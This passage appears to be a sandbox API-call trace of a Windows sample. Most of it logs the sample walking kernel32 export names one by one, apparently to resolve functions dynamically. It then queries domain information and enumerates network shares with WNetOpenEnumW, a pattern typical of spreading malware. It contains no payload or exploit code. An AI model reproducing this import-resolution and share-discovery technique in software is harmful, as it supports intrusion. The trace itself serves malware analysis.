out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0035.209] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0035.209] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0035.209] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0035.209] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0035.209] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0035.209] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0035.209] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0035.209] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0035.209] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0035.209] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0035.209] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0035.209] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0035.209] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0035.209] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0035.209] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0035.209] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0035.209] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0035.210] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0035.210] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0035.210] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0035.210] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0035.210] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0035.210] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0035.210] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0035.210] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0035.210] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0035.210] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0035.210] lstrlenA (lpString="BEEP") returned 4 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0035.210] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0035.210] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0035.210] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0035.210] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0035.210] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0035.210] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0035.210] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0035.210] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0035.211] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0035.211] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0035.211] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0035.211] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0035.211] lstrlenA (lpString="CANCELIO") returned 8 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0035.211] lstrlenA (lpString="CANCELIOEX") returned 10 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0035.211] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0035.211] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0035.211] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0035.211] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0035.211] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0035.211] lstrlenA (lpString="CHECKELEVATION") returned 14 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0035.211] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0035.211] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0035.211] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0035.211] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0035.211] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0035.211] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0035.211] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0035.212] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0035.212] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0035.212] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0035.212] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0035.212] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0035.212] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0035.212] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0035.212] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0035.212] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0035.212] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0035.212] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0035.212] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0035.212] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0035.212] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0035.212] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0035.212] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0035.212] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0035.212] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0035.213] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0035.213] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0035.213] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0035.213] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0035.213] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0035.213] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0035.213] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0035.213] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0035.213] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0035.213] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0035.213] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0035.213] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0035.213] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0035.213] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0035.213] lstrlenA (lpString="COPYCONTEXT") returned 11 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0035.213] lstrlenA (lpString="COPYFILEA") returned 9 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0035.213] lstrlenA (lpString="COPYFILEEXA") returned 11 [0035.213] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0035.214] lstrlenA (lpString="COPYFILEEXW") returned 11 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0035.214] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0035.214] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0035.214] lstrlenA (lpString="COPYFILEW") returned 9 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0035.214] lstrlenA (lpString="COPYLZFILE") returned 10 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0035.214] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0035.214] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0035.214] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0035.214] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0035.214] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0035.214] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0035.214] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0035.214] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0035.214] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0035.214] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0035.214] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0035.214] lstrlenA (lpString="CREATEEVENTA") returned 12 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0035.214] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0035.214] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0035.214] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0035.215] lstrlenA (lpString="CREATEEVENTW") returned 12 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0035.215] lstrlenA (lpString="CREATEFIBER") returned 11 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0035.215] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0035.215] lstrlenA (lpString="CREATEFILEA") returned 11 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0035.215] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0035.215] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0035.215] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0035.215] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0035.215] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0035.215] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0035.215] lstrlenA (lpString="CREATEFILEW") returned 11 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0035.215] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0035.215] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0035.215] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0035.215] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0035.216] lstrcpyW (in: lpString1=0x1a0000, lpString2="none|" | out: lpString1="none|") returned="none|" [0035.216] DsRoleGetPrimaryDomainInformation () returned 0x0 [0035.218] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x0, lphEnum=0xc9e8ac | out: lphEnum=0xc9e8ac*=0x5f8758) returned 0x0 [0035.603] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x3000, flProtect=0x4) returned 0x350000 [0035.604] WNetEnumResourceW (in: hEnum=0x5f8758, lpcCount=0xc9e8b0, lpBuffer=0x350000, lpBufferSize=0xc9e8a8 | out: lpcCount=0xc9e8b0, lpBuffer=0x350000, lpBufferSize=0xc9e8a8) returned 0x0 [0035.604] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x350000, lphEnum=0xc9e87c | out: lphEnum=0xc9e87c*=0x5ebed0) returned 0x0 [0035.606] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, 